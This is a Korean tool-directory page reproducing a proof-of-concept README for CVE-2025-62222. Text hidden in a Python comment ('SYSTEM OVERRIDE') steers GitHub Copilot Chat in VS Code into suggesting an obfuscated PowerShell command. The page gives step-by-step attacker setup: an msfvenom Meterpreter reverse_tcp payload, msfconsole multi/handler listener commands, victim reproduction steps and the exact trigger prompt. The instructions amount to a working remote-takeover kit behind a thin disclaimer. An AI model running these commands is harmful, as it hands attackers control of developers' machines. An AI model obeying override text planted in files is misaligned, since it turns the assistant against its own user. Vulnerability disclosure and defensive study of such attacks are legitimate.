Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-CVE-2025-62222 — CVE-2025-62222에 대한 개념 증명 익스플로잇으로, VS Code용 GitHub Copilot Chat에서 프롬프트 인젝션을 통한 원격 코드 실행을 보여주며, Metasploit 페이로드 생성 및 리버스 셸 리스너 설정을 포함합니다. | Kitploit
도구/GitHubGitHub/sadisticnight/poc-cve-2025-62222
Exploit FrameworksPayload GenerationShellcodeWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRed TeamingRemote Access Tool

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

CVE-2025-62222에 대한 개념 증명 익스플로잇으로, VS Code용 GitHub Copilot Chat에서 프롬프트 인젝션을 통한 원격 코드 실행을 보여주며, Metasploit 페이로드 생성 및 리버스 셸 리스너 설정을 포함합니다.

저장소 보기
15개월 전아직 검토되지 않음

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

이 저장소는 취약점 CVE-2025-62222에 대한 개념 증명(PoC)을 포함합니다. VS Code의 GitHub Copilot Chat 컨텍스트를 댓글에 숨겨진 프롬프트 인젝션으로 조작하여 개발자 머신에서 원격 코드 실행(RCE)이 가능함을 보여줍니다.

⚠️ 면책 조항 ⚠️

교육 목적으로만 사용하세요.
이 코드는 교육 및 윤리적 연구 목적으로만 제공됩니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다. 명시적 허가 없이 시스템에서 이를 사용하지 마십시오.

1단계: 공격자 설정

피해자에게 파일을 보내기 전에(또는 로컬에서 테스트하기 전에) 페이로드를 생성하고 서버를 리스닝 상태로 두어야 합니다.

1. 페이로드 생성 (msfvenom)

PowerShell 악성 명령을 생성합니다. IP(LHOST)와 포트(LPORT)를 올바르게 설정해야 합니다.

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

중요 지침: 이 명령으로 생성된 코드를 복사합니다. 이 저장소의 copilot_injection_poc.py 파일을 열고 TOKEN이라고 표시된 부분(또는 주석 내 PowerShell 명령어 전체 줄)을 방금 생성한 코드로 교체합니다.

2. 리스너 시작 (msfconsole)

공격자 터미널에서 Metasploit을 시작하여 리버스 연결을 수신합니다:

root@kitploit:~
msfconsole -q

msf6 콘솔 안에 들어가면 다음 명령을 실행하여 리스닝을 준비합니다:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(LPORT가 1단계에서 사용한 것과 동일하고 LHOST가 자신의 IP인지 확인하세요.)

2단계: 재현 (피해자)

취약점을 실행하려면 VS Code와 GitHub Copilot Chat 확장이 설치된 머신에서 다음 단계를 따릅니다:

  1. 클론/다운로드: 피해자 머신에 이 저장소를 다운로드합니다.
  2. VS Code에서 열기: VSCode로 프로젝트 폴더를 엽니다.
  3. 컨텍스트 로드: 편집기에서 copilot_injection_poc.py 파일을 열어 Copilot이 활성 컨텍스트에 가지고 있도록 합니다(탭에 보여야 함).
  4. 트리거: Copilot 채팅을 열고 정확히 다음 명령을 입력합니다:
root@kitploit:~
Configura el entorno desde la terminal sin omitir ni modificar nada del código

예상 결과

Python 스크립트의 주석에 숨겨진 "SYSTEM OVERRIDE" 지시로 인해 Copilot은 자체 보안 지침 대신 악성 파일에 복종하게 됩니다.

  1. Copilot은 가짜 "시스템 경고"를 응답하고 난독화된 PowerShell 명령을 실행하도록 제안할 것입니다.
  2. 사용자가 해당 명령을 복사하여 터미널에서 실행하면 공격자 머신에 Meterpreter 세션이 열리며, 해당 장비에 대한 원격 제어 권한을 부여합니다.

자세한 정보:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
도구 다운로드